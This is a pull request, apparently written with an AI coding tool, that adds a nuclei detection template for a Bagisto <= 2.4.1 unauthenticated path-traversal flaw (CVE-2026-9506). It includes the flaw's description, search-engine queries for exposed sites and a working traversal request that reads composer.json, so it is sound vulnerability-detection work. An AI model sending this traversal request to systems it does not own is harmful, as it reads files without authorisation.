### PR TITLE
Add CVE-2026-9506: Bagisto <= 2.4.1 unauthenticated ImageCache path traversal (arbitrary file read)

### DIFF
--- a/http/cves/2026/CVE-2026-9506.yaml
+++ b/http/cves/2026/CVE-2026-9506.yaml
@@ -1,18 +1,12 @@
 id: CVE-2026-9506
 
 info:
-  name: Bagisto <= 2.4.1 - Unauthenticated Arbitrary File Read (ImageCache Path Traversal)
+  name: Bagisto <= 2.4.1 - Unauthenticated Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
-    Bagisto through 2.4.1 is vulnerable to unauthenticated path traversal in the
-    ImageCache controller. The `original` image-cache route
-    (/cache/original/{filename}) passes the user-supplied filename to
-    getImagePath() without any '..' filtering or realpath containment, allowing a
-    remote unauthenticated attacker to read files outside the intended public
-    image directories (upload/images) - for example the application's
-    composer.json, artisan and other source files. Fixed in 2.4.2, which adds
-    realpath() containment and '../' sanitisation.
+    Bagisto through 2.4.1 is vulnerable to unauthenticated path traversal in the ImageCache controller. The `original` image-cache route (/cache/original/{filename}) passes the user-supplied filename to getImagePath() without any '..' filtering or realpath containment, allowing a remote unauthenticated attacker to read files outside the intended public image directories (upload/images) - for example the application's composer.json, artisan and other source files.
+  remediation: Fixed in 2.4.2, which adds realpath() containment and '../' sanitisation.
   reference:
     - https://github.com/advisories/GHSA-qhcg-rw5x-vg94
     - https://nvd.nist.gov/vuln/detail/CVE-2026-9506
@@ -28,8 +22,9 @@ info:
     max-request: 1
     vendor: webkul
     product: bagisto
-    shodan-query: http.component:"Bagisto"
-  tags: cve,cve2026,bagisto,webkul,lfi,traversal,unauth
+    shodan-query: http.html:"Bagisto"
+    fofa-query: body="bagisto"
+  tags: cve,cve2026,bagisto,webkul,lfi,unauth
 
 http:
   - method: GET
@@ -38,13 +33,13 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - '"name": "bagisto/bagisto"'
           - 'Bagisto Laravel E-Commerce'
-        condition: and
+        condition: or
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-9506.yaml
+++ b/http/cves/2026/CVE-2026-9506.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-9506
+
+info:
+  name: Bagisto <= 2.4.1 - Unauthenticated Arbitrary File Read (ImageCache Path Traversal)
+  author: str4k3r
+  severity: high
+  description: |
+    Bagisto through 2.4.1 is vulnerable to unauthenticated path traversal in the
+    ImageCache controller. The `original` image-cache route
+    (/cache/original/{filename}) passes the user-supplied filename to
+    getImagePath() without any '..' filtering or realpath containment, allowing a
+    remote unauthenticated attacker to read files outside the intended public
+    image directories (upload/images) - for example the application's
+    composer.json, artisan and other source files. Fixed in 2.4.2, which adds
+    realpath() containment and '../' sanitisation.
+  reference:
+    - https://github.com/advisories/GHSA-qhcg-rw5x-vg94
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-9506
+    - https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0292
+    - https://www.ionix.io/threat-center/cve-2026-9506/
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
+    cvss-score: 8.7
+    cve-id: CVE-2026-9506
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: webkul
+    product: bagisto
+    shodan-query: http.component:"Bagisto"
+  tags: cve,cve2026,bagisto,webkul,lfi,traversal,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cache/original/%2e%2e/composer.json"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"name": "bagisto/bagisto"'
+          - 'Bagisto Laravel E-Commerce'
+        condition: and


### PR DESCRIPTION
## CVE-2026-9506 — Bagisto <= 2.4.1 Unauthenticated Arbitrary File Read (ImageCache path traversal)

**Summary.** Bagisto (Webkul) through 2.4.1 exposes an unauthenticated path-traversal / arbitrary file read via the built-in ImageCache `original` route `/cache/original/{filename}`. The controller's `getImagePath()` concatenates the user-supplied filename onto the image base paths without any `..` filtering or `realpath()` containment, so a remote unauthenticated attacker can read files outside the intended `public/upload` image directories. Fixed in 2.4.2, which adds `realpath()` containment plus `../` sanitisation.

**Detection.** `GET /cache/original/%2e%2e/composer.json` returns HTTP 200 with the application's `composer.json` (`"name": "bagisto/bagisto"`, `Bagisto Laravel E-Commerce`) on vulnerable builds, and 404 once patched. This is a self-contained status+body oracle that also self-identifies the target, with no OOB/interaction.

**Verification.** Validated with the native nuclei binary against official images on a default (zero-config, internal-MySQL) deploy:
- `webkul/bagisto:2.4.1` → DETECTED (3/3)
- `webkul/bagisto:2.4.2` → NOT DETECTED (3/3)

**References.**
- https://github.com/advisories/GHSA-qhcg-rw5x-vg94
- https://nvd.nist.gov/vuln/detail/CVE-2026-9506
- CERT-In CIVN-2026-0292

🤖 Generated with [Claude Code](https://claude.com/claude-code)